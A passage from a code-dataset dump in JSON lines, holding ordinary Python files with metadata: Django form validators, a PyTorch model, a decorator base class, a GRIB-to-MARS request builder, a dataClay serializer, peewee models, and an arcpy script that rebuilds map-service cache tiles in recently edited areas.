constructor\n self.fields['frame_quality'].widget.attrs['min'] = 1\n self.fields['frame_margin'].widget.attrs['min'] = 0\n self.fields['silent_speed'].widget.attrs['min'] = 1\n self.fields['silence_threshold'].widget.attrs['min'] = 0\n\n def clean_frame_quality(self):\n frame_quality = self.cleaned_data['frame_quality']\n if 1 <= frame_quality <= 31:\n return frame_quality\n else:\n raise forms.ValidationError('Frame Quality Value must be in this range (1 to 31)')\n\n def clean_frame_margin(self):\n frame_margin = self.cleaned_data['frame_margin']\n if 0 <= frame_margin <= 120:\n return frame_margin\n else:\n raise forms.ValidationError('Frame Margin Value must be in this range (0 to 120)')\n\n def clean_playback_speed(self):\n playback_speed = self.cleaned_data['playback_speed']\n if 0.5 <= playback_speed <= 2.25:\n return playback_speed\n else:\n raise forms.ValidationError('Playback Speed Value must be in this range (0.5 to 2.25)')\n\n def clean_silent_speed(self):\n silent_speed = self.cleaned_data['silent_speed']\n if 1 <= silent_speed <= 100:\n return silent_speed\n else:\n raise forms.ValidationError('Silent Speed Value must be in this range (1 to 100)')\n\n def clean_silence_threshold(self):\n silence_threshold = self.cleaned_data['silence_threshold']\n if 0 <= silence_threshold <= 1:\n return silence_threshold\n else:\n raise forms.ValidationError('Silence Threshold Value must be in this range (0 to 1)')\n\n\nQUALITY = [\n ('Default', 'Default'),\n ('1080p', '1080p'),\n ('720p', '720p'),\n ('480p', '480p'),\n ('360p', '360p'),\n ('240p', '240p'),\n ('144p', '144p')\n]\n\n\nclass UrlForm(forms.Form):\n paste_URL = forms.URLField(widget=forms.TextInput(attrs={'rows': 1, 'cols': 100}), required=True)\n quality = forms.CharField(widget=forms.Select(choices=QUALITY), initial=\"Default\")\n\n def clean_paste_URL(self):\n pattern = re.compile(r'.+youtube\\.com/watch\\?.+')\n paste_url = self.cleaned_data['paste_URL']\n if pattern.match(paste_url):\n print(paste_url)\n return paste_url\n else:\n raise forms.ValidationError('Please enter a youtube video')\n\n\ndef validate_file_extension(value):\n import os\n from django.core.exceptions import ValidationError\n ext = os.path.splitext(value.name)[1]\n valid_extensions = ['.mp4', '.mov', '.mpeg', '.wmv']\n if not ext.lower() in valid_extensions:\n raise ValidationError('Unsupported file extension.')\n\n\nclass UploadVideoForm(forms.Form):\n title = forms.CharField(max_length=70, required=True, initial=\"VideoShortCuts\")\n file = forms.FileField(required=True, validators=[validate_file_extension])\n\n\nclass SubmitForm(forms.Form):\n origin_video_size = forms.CharField(required=False)\n origin_video_length = forms.CharField(required=False)\n new_video_size = forms.CharField(required=False)\n new_video_length = forms.CharField(required=False)\n", "sub_path": "process/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 3879, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.arange", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 15, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 15, "usage_type": "call"}, {"api_name": "django.forms.IntegerField", 
"line_number": 16, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.FloatField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.FloatField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 34, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 34, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 41, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 41, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 48, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 48, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 55, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 55, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 62, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 62, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 76, "usage_type": "name"}, {"api_name": "django.forms.URLField", "line_number": 77, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 77, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 77, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 78, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 78, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 78, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 81, "usage_type": "call"}, {"api_name": "django.forms.ValidationError", "line_number": 87, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 87, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 96, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 99, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 99, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 100, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 100, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 101, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 101, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 104, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 104, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 105, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 105, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 106, "usage_type": "call"}, {"api_name": 
"django.forms", "line_number": 106, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 107, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 107, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 108, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 108, "usage_type": "name"}]} +{"seq_id": "307691743", "text": "import torch\nimport torch.nn as nn\n\nclass ClassicNN(nn.Module):\n \"\"\"1136 100 46\"\"\"\n def __init__(self, d_dim=20499, dim1=1136, dim2=100):\n super(ClassicNN, self).__init__()\n self.dim1 = dim1\n self.dim2 = dim2\n self.d_dim = d_dim\n self.h1 = nn.Sequential(\n nn.Linear(self.d_dim, self.dim1),\n nn.Tanh(),\n )\n self.h2 = nn.Sequential(\n nn.Linear(self.dim1, self.dim2),\n nn.Tanh(),\n )\n self.o = nn.Sequential(\n nn.Linear(self.dim2, 46),\n )\n print(self)\n\n def forward(self, x, target_layer=0):\n h1_output = self.h1(x)\n h2_output = self.h2(h1_output)\n output = self.o(h2_output)\n if target_layer == 1:\n return h1_output\n elif target_layer == 2:\n return h2_output\n else:\n return output", "sub_path": "other_codes/classicNN/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 889, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 4, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "133641219", "text": "from __future__ import absolute_import\nimport logging\n\nfrom decorators import FuncDecorator\n\nfrom ..exception import CallError\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass TargetDecorator(FuncDecorator):\n def normalize_target_params(self, request, controller_args, controller_kwargs):\n return [], dict(\n request=request,\n controller_args=controller_args, \n controller_kwargs=controller_kwargs\n )\n\n def handle_error(self, e):\n raise e\n\n def handle_target(self, request, controller_args, controller_kwargs):\n try:\n param_args, param_kwargs = self.normalize_target_params(\n request=request,\n controller_args=controller_args,\n controller_kwargs=controller_kwargs\n )\n ret = self.target(*param_args, **param_kwargs)\n if not ret:\n raise ValueError(\"{} check failed\".format(self.__class__.__name__))\n\n except CallError:\n raise\n\n except (AttributeError, 
TypeError) as e:\n logger.debug(e, exc_info=True)\n raise NotImplementedError(e.message)\n\n except Exception as e:\n logger.debug(e, exc_info=True)\n self.handle_error(e)\n\n def decorate(self, func, target, *anoop, **kwnoop):\n if target:\n self.target = target\n\n def decorated(decorated_self, *args, **kwargs):\n self.handle_target(\n request=decorated_self.request,\n controller_args=args,\n controller_kwargs=kwargs\n )\n return func(decorated_self, *args, **kwargs)\n\n return decorated\n\n", "sub_path": "endpoints/decorators/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 1686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "decorators.FuncDecorator", "line_number": 12, "usage_type": "name"}, {"api_name": "exception.CallError", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "374863572", "text": "import os\nimport eccodes as ecc\nimport argparse\nimport sys\n\nclass Request(object):\n\n def __init__(self,Action=None,Source=None,Date=None,Hour=None,Origin=None,Type=None,Step=None,Levelist=None,Param=None,Levtype=None,\n Database=\"marsscratch\",Expver=\"prod\",Class=\"RR\",Stream=\"oper\"):\n \"\"\" Construct a request for mars\"\"\"\n self.action = Action\n self.source = Source\n self.database = Database\n self.date = Date\n self.hour = Hour\n self.origin = Origin\n self.type = Type\n self.step = Step if type(Step) == list else [Step]\n self.param = Param if type(Param) == list else [Param]\n self.levelist = Levelist if type(Levelist) == list else [Levelist]\n self.levtype = Levtype\n self.expver = Expver\n self.marsClass = Class\n self.stream = Stream\n self.expect = len(self.step)*len(self.param)*len(self.levelist)\n\n def write_request(self,f):\n separator = '/'\n if self.database:\n f.write('%s,source=%s,database=%s,\\n' % (self.action,self.source,self.database))\n else:\n f.write('%s,source=%s,\\n' % (self.action,self.source))\n f.write(_line('DATE',self.date))\n f.write(_line('TIME',self.hour))\n f.write(_line('ORIGIN',self.origin.upper()))\n f.write(_line('STEP',separator.join(str(x) for x in self.step)))\n if self.levtype.lower() != \"sfc\".lower():\n f.write(_line('LEVELIST',separator.join(str(x) for x in self.levelist)))\n f.write(_line('PARAM',separator.join(str(x) for x in self.param)))\n f.write(_line('EXPVER',self.expver.lower()))\n f.write(_line('CLASS ',self.marsClass.upper()))\n f.write(_line('LEVTYPE',self.levtype.upper()))\n f.write(_line('TYPE',self.type.upper()))\n f.write(_line('STREAM',self.stream.upper()))\n f.write(_line('EXPECT',self.expect,eol=\"\"))\n\n\nclass RequestFromGrib(Request):\n\n def __init__(self,gribfile,Action,Database='marsscratch'):\n super().__init__(Database=Database)\n self.source = gribfile\n self.action = Action\n self.parse_grib_file()\n\n def parse_grib_file(self):\n gribfile = self.source\n self.type,self.date,self.hour,self.levtype,grib2 = os.path.basename(gribfile).split('.')\n\n params = []\n levels = []\n steps = []\n with ecc.GribFile(gribfile) as gf:\n nfields = len(gf)\n for i in range(len(gf)):\n msg = ecc.GribMessage(gf)\n params.append(msg['param'])\n levels.append(msg['level'])\n steps.append(msg['step'])\n if i == 1:\n self.date = str(msg[\"dataDate\"])\n self.hour = \"%04d\" % int(msg[\"dataTime\"])\n\n if str(msg['suiteName']) == '1':\n self.origin = \"no-ar-ce\"\n elif str(msg['suiteName']) == '2':\n self.origin = \"no-ar-cw\"\n elif 
str(msg['suiteName']) == '3':\n self.origin = \"no-ar-pa\"\n else:\n print(\"unknown origin/suiteName\")\n exit(1)\n\n param = list(set(params))\n param.sort()\n self.param = param\n levelist = list(set(levels))\n levelist.sort()\n levelist.reverse()\n self.levelist = levelist\n step = list(set(steps))\n step.sort()\n self.step = step\n self.expect = nfields\n\n\ndef _line(key,val,eol=','):\n return \" %s= %s%s\\n\" % (key.ljust(11),val,eol)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='dump mars request from input gribfile')\n parser.add_argument('filename',type=str,help='grib file name')\n parser.add_argument('--database',type=str,default='marsscratch',help='mars database')\n\n args = parser.parse_args()\n\n gribfile = args.filename\n \n if args.database == \"mars\":\n database = None\n else:\n database = args.database\n\n with sys.stdout as rf:\n req = RequestFromGrib(gribfile,\"archive\",database)\n req.write_request(rf)\n\nexit()\n", "sub_path": "util/carra_grib2/archive/make_archive_request.py", "file_name": "make_archive_request.py", "file_ext": "py", "file_size_in_byte": 4186, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.basename", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "eccodes.GribFile", "line_number": 63, "usage_type": "call"}, {"api_name": "eccodes.GribMessage", "line_number": 66, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 103, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 116, "usage_type": "attribute"}]} +{"seq_id": "71247957", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/dataclay/serialization/python/lang/DCIDWrapper.py\n# Compiled at: 2019-10-28 11:50:26\n# Size of source mod 2**32: 1044 bytes\n\"\"\" Class description goes here. 
\"\"\"\nimport uuid\nimport dataclay.serialization.python.DataClayPythonWrapper as DataClayPythonWrapper\nimport dataclay.serialization.python.lang.BooleanWrapper as BooleanWrapper\n__author__ = 'Alex Barcelo '\n__copyright__ = '2015 Barcelona Supercomputing Center (BSC-CNS)'\n\nclass DCIDWrapper(DataClayPythonWrapper):\n __doc__ = 'dataClay UUID (straightforward serialization).'\n __slots__ = ('_nullable', )\n\n def __init__(self, nullable=False):\n self._nullable = nullable\n\n def read(self, io_file):\n if self._nullable:\n present = BooleanWrapper().read(io_file)\n if not present:\n return\n return uuid.UUID(bytes=(str(io_file.read(16))))\n\n def write(self, io_file, value):\n if self._nullable:\n if value is None:\n BooleanWrapper().write(io_file, False)\n return\n BooleanWrapper().write(io_file, True)\n io_file.write(value.get_bytes())", "sub_path": "pycfiles/dataClay-2.1-py3.7/DCIDWrapper.cpython-37.py", "file_name": "DCIDWrapper.cpython-37.py", "file_ext": "py", "file_size_in_byte": 1327, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "dataclay.serialization.python.DataClayPythonWrapper", "line_number": 15, "usage_type": "name"}, {"api_name": "dataclay.serialization.python.lang.BooleanWrapper", "line_number": 24, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 27, "usage_type": "call"}, {"api_name": "dataclay.serialization.python.lang.BooleanWrapper", "line_number": 32, "usage_type": "call"}, {"api_name": "dataclay.serialization.python.lang.BooleanWrapper", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "167398375", "text": "import logging\nimport json\nimport datetime\n\nfrom src.database import database\nfrom peewee import *\n\n\nclass Serializer(object):\n\n def convert_value(self, value):\n is1 = isinstance(value, datetime.datetime)\n is2 = isinstance(value, datetime.date)\n is3 = isinstance(value, datetime.time)\n\n if is1 or is2 or is3:\n return Serializer.datetime(value)\n elif isinstance(value, Model):\n return value.get_id()\n else:\n return value\n\n def clean_data(self, data):\n for key, value in data.items():\n if isinstance(value, dict):\n self.clean_data(value)\n elif isinstance(value, (list, tuple)):\n data[key] = map(self.clean_data, value)\n else:\n data[key] = self.convert_value(value)\n return data\n\n def serialize_object(self, obj, fields=None, exclude=None):\n data = BaseModel.get_dictionary_from_model(obj, fields, exclude)\n return self.clean_data(data)\n\n @staticmethod\n def datetime(obj):\n \"\"\"Default JSON serializer.\"\"\"\n import calendar\n from datetime import date, datetime\n\n if isinstance(obj, datetime):\n if obj.utcoffset() is not None:\n obj = obj - obj.utcoffset()\n\n elif isinstance(obj, date):\n obj = datetime.combine(obj, datetime.min.time())\n\n return int(calendar.timegm(obj.timetuple()))\n\n\nclass Deserializer(object):\n def deserialize_object(self, model, data):\n return BaseModel.get_model_from_dictionary(model, data)\n\n\nclass BaseModel(Model, Serializer, Deserializer):\n created_at = DateTimeField(default=datetime.datetime.now)\n modified_at = DateTimeField(default=datetime.datetime.now)\n deleted = BooleanField(default=False)\n\n class Meta:\n database = database\n\n @classmethod\n def fetch(cls, *selection):\n return cls.select(*selection).where(cls.deleted == False)\n\n def save(self, *args, **kwargs):\n self.modified_at = datetime.datetime.now()\n return super(BaseModel, self).save(*args, **kwargs)\n\n @classmethod\n def 
delete(cls, permanently=False):\n if permanently:\n return super(BaseModel, cls).delete()\n else:\n return super(BaseModel, cls).update(deleted=True, modified_at=datetime.datetime.now())\n\n @classmethod\n def update(cls, **update):\n update[\"modified_at\"] = datetime.datetime.now()\n return super(BaseModel, cls).update(**update)\n\n def delete_instance(self, permanently=False, recursive=False, delete_nullable=False):\n\n if permanently:\n return self.delete(permanently).where(self.pk_expr()).execute()\n else:\n self.deleted = True\n return self.save()\n\n def to_json(self):\n return json.dumps(self, default=self.serialize_object)\n\n def __str__(self):\n return str(self.get_dictionary())\n\n def get_dictionary(self, fields=None, exclude=None):\n return BaseModel.get_dictionary_from_model(self, fields, exclude)\n\n @staticmethod\n def get_dictionary_from_model(model, fields=None, exclude=None):\n model_class = type(model)\n data = {}\n\n fields = fields or {}\n exclude = exclude or {}\n curr_exclude = exclude.get(model_class, [])\n curr_fields = fields.get(model_class, model._meta.get_field_names())\n\n for field_name in curr_fields:\n if field_name in curr_exclude:\n continue\n\n field_obj = model_class._meta.fields[field_name]\n field_data = model._data.get(field_name)\n if isinstance(field_obj, ForeignKeyField) and field_data and field_obj.rel_model in fields:\n rel_obj = getattr(model, field_name)\n data[field_name] = BaseModel.get_dictionary_from_model(rel_obj, fields, exclude)\n else:\n data[field_name] = field_data\n\n return data\n\n @staticmethod\n def get_model_from_dictionary(model, field_dict):\n if isinstance(model, Model):\n model_instance = model\n check_fks = True\n else:\n model_instance = model()\n check_fks = False\n models = [model_instance]\n for field_name, value in field_dict.items():\n field_obj = model._meta.fields[field_name]\n if isinstance(value, dict):\n rel_obj = field_obj.rel_model\n if check_fks:\n try:\n rel_obj = getattr(model, field_name)\n except field_obj.rel_model.DoesNotExist:\n pass\n if rel_obj is None:\n rel_obj = field_obj.rel_model\n rel_inst, rel_models = BaseModel.get_model_from_dictionary(rel_obj, value)\n models.extend(rel_models)\n setattr(model_instance, field_name, rel_inst)\n else:\n setattr(model_instance, field_name, field_obj.python_value(value))\n return model_instance, models\n\n @staticmethod\n def get_object_id(obj):\n if isinstance(obj, BaseModel):\n return obj.id\n elif isinstance(obj, int):\n return obj\n else:\n try:\n return int(obj)\n except (TypeError, ValueError):\n return None\n\n\nclass JsonField(TextField):\n def db_value(self, value):\n return json.dumps(value, default=Serializer.datetime)\n\n def python_value(self, value):\n try:\n return json.loads(value)\n except ValueError as e:\n logging.error(\"Failed to decode JSON: %s\" % e)\n return dict()\n\n\nclass EnumField(TextField):\n\n def values(self, values):\n self.values = values\n return self\n\n def db_value(self, value):\n if value in self.values:\n return value\n else:\n return self.default\n", "sub_path": "backend/src/models/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 5971, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 13, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 14, "usage_type": "attribute"}, {"api_name": 
"datetime.datetime", "line_number": 43, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 47, "usage_type": "name"}, {"api_name": "datetime.datetime.combine", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "datetime.datetime.min.time", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime.min", "line_number": 48, "usage_type": "attribute"}, {"api_name": "calendar.timegm", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "attribute"}, {"api_name": "src.database.database", "line_number": 64, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 79, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 95, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 169, "usage_type": "call"}, {"api_name": "{'calendar': 'calendar', 'date': 'datetime.date', 'datetime': 'datetime.datetime'}.datetime", "line_number": 169, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 173, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "134189134", "text": "#---------------------------------------------------------------------------------------------------------------\n# Name: Rebuild Cached Map Service Tiles in Updated Areas\n#\n# Purpose: Rebuilds tiles for a cached map service in areas that have been updated in a reference layer within a time period specified relative to the day the script runs.\n#\n# Author: Patrick McKinney\n#\n# Created: 9/2/2020\n#\n# Copyright: (c) Cumberland County 2020\n#\n# Disclaimer: CUMBERLAND COUNTY ASSUMES NO LIABILITY ARISING FROM USE OF THESE MAPS OR DATA. THE MAPS AND DATA ARE PROVIDED WITHOUT\n# WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\n# FITNESS FOR A PARTICULAR PURPOSE.\n# Furthermore, Cumberland County assumes no liability for any errors, omissions, or inaccuracies in the information provided regardless\n# of the cause of such, or for any decision made, action taken, or action not taken by the user in reliance upon any maps or data provided\n# herein. 
The user assumes the risk that the information may not be accurate.\n#-------------------------------------------------------------------------------------------------------------------\n\n# Import system modules\nimport arcpy, sys, time, datetime\n\ntry:\n # get timestamp for starting processing\n start_time = time.perf_counter()\n\n # Name of service\n service_name = 'Name of Service'\n\n # date for the day the script is run on\n date_today = datetime.date.today()\n # Date formatted as month-day-year (1-1-2017)\n formatted_date_today = date_today.strftime('%m-%d-%Y')\n # date for how many days back you want to check for changes in a dataset\n # change 8 to how many days back you want to check for changes\n date_ago = date_today - datetime.timedelta(days=8)\n\n # variable to store messages for log file. Messages written in finally statement at end of script\n log_message = ''\n # Create text file for logging results of script\n log_file = r'C:\\GIS\\Logs\\Rebuild Map Tiles Report {}.txt'.format(formatted_date_today)\n\n # layer you want to check for changes in\n # there needs to be a Date field that captures when edits occur\n # ideally this would be an Editor Tracking field\n # see https://pro.arcgis.com/en/pro-app/tool-reference/data-management/enable-editor-tracking.htm\n reference_layer = r'C:\\GIS\\Data\\reference_layer.shp'\n # make feature layer so you can use the select by attributes function\n ref_lyr_file = arcpy.MakeFeatureLayer_management(reference_layer, 'My_Layer')\n\n # SQL query clause\n # the format for queries using date fields changes based upon your data's format\n # read the docs > https://pro.arcgis.com/en/pro-app/help/mapping/navigation/sql-reference-for-elements-used-in-query-expressions.htm\n # replace \"last_edited_date\" with whatever field represents the date last modified\n where_clause = \"\"\"last_edited_date >= date '{}' AND last_edited_date <= date '{}'\"\"\".format(date_ago, date_today)\n\n # select features from reference layer that have been modified within your specified date range (i.e., within last week)\n arcpy.SelectLayerByAttribute_management(ref_lyr_file, 'NEW_SELECTION', where_clause)\n\n # get count of features; GetCount_management returns the count as a string, so cast to int\n count_selected_reference = int(arcpy.GetCount_management(ref_lyr_file)[0])\n # verify records have been selected; if not, add message and exit script\n if count_selected_reference == 0:\n # add message\n log_message += 'No \"Reference Layer\" records have been modified between {} and {}\\n'.format(date_ago, date_today)\n # exit\n sys.exit()\n\n # grid layer that covers your area of interest (city, county, state, etc)\n cache_grid_tiles = r'C:\\GIS\\Data\\grids_layer.shp'\n # make feature layer so you can select by location\n cache_grid_tiles_lyr = arcpy.MakeFeatureLayer_management(cache_grid_tiles, 'Grid_Tiles')\n\n # select tile grids that intersect selected records from reference layer\n arcpy.SelectLayerByLocation_management(cache_grid_tiles_lyr, 'INTERSECT', ref_lyr_file)\n\n # get count of features\n count_selected_grids = int(arcpy.GetCount_management(cache_grid_tiles_lyr)[0])\n # verify records have been selected; if not, add message and exit script\n if count_selected_grids == 0:\n # add message\n log_message += 'No \"Grid\" features intersect \"Reference Layer\" records that have been modified between {} and {}\\n'.format(date_ago, date_today)\n # exit\n sys.exit()\n\n # use selected records from grid tiles as area of interest for rebuilding cached map service tiles\n area_of_interest_lyr = r'memory\\selected_grids'\n # copy 
selected features from grid layer to in memory\n arcpy.CopyFeatures_management(cache_grid_tiles_lyr, area_of_interest_lyr)\n\n # add message\n log_message += 'Added selected \"Grid\" features to {}\\n'.format(area_of_interest_lyr)\n log_message += '\\nSelected grids:\\n\\n'\n\n # loop through Grid layer and list what records have been selected\n # you can then use these as areas to check to verify your tiles have rebuilt the data\n # replace 'LabelField' with a field in your Grid layer\n with arcpy.da.SearchCursor(area_of_interest_lyr, 'LabelField') as cursor:\n for row in cursor:\n log_message += '\\t{}\\n'.format(row[0])\n\n # create feature set object\n # see https://pro.arcgis.com/en/pro-app/arcpy/classes/featureset.htm\n feature_set = arcpy.FeatureSet()\n # load selected records from Grid layer into feature set\n feature_set.load(area_of_interest_lyr)\n\n # sign-in to Portal or ArcGIS Online\n arcpy.SignInToPortal('Portal or ArcGIS Online URL', 'user name', 'password')\n\n # geoprocessing - rebuild map service cache tiles\n # see https://pro.arcgis.com/en/pro-app/tool-reference/server/manage-map-server-cache-tiles.htm\n # manually rebuilding the tiles for the service and copying the geoprocessing tool as a Python snippet\n # can be used to help set up this call\n arcpy.server.ManageMapServerCacheTiles('service url', ['scales to rebuild'], 'RECREATE_ALL_TILES', -1, feature_set, wait_for_job_completion='WAIT')\n\n # get time stamp for end of processing\n finish_time = time.perf_counter()\n # time of processing in seconds\n elapsed_time = finish_time - start_time\n # time in minutes\n elapsed_time_minutes = round((elapsed_time / 60), 2)\n # time in hours\n elapsed_time_hours = round((elapsed_time_minutes / 60), 2)\n\n log_message += '\\n\\nRebuilt cached tiles for {} in {}-hours on {}\\n'.format(service_name, elapsed_time_hours, formatted_date_today)\n# If an error occurs running geoprocessing tool(s), capture the error and write a message\n# handle errors raised outside of the Python system\nexcept EnvironmentError as e:\n tbE = sys.exc_info()[2]\n # Write the line number the error occurred to the log file\n log_message += '\\nFailed at Line {}\\n'.format(tbE.tb_lineno)\n # Write the error message to the log file\n log_message += 'Error: {}'.format(str(e))\n# handle exception error\nexcept Exception as e:\n # Store information about the error\n tbE = sys.exc_info()[2]\n # Write the line number the error occurred to the log file\n log_message += '\\nFailed at Line {}\\n'.format(tbE.tb_lineno)\n # Write the error message to the log file\n log_message += 'Error: {}'.format(e)\nfinally:\n # write message to log file\n try:\n with open(log_file, 'w') as f:\n f.write(str(log_message))\n except:\n pass", "sub_path": "rebuild_map_service_tiles_in_updated_areas.py", "file_name": "rebuild_map_service_tiles_in_updated_areas.py", "file_ext": "py", "file_size_in_byte": 7511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.perf_counter", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "arcpy.MakeFeatureLayer_management", "line_number": 49, "usage_type": "call"}, {"api_name": "arcpy.SelectLayerByAttribute_management", "line_number": 58, "usage_type": "call"}, {"api_name": "arcpy.GetCount_management", 
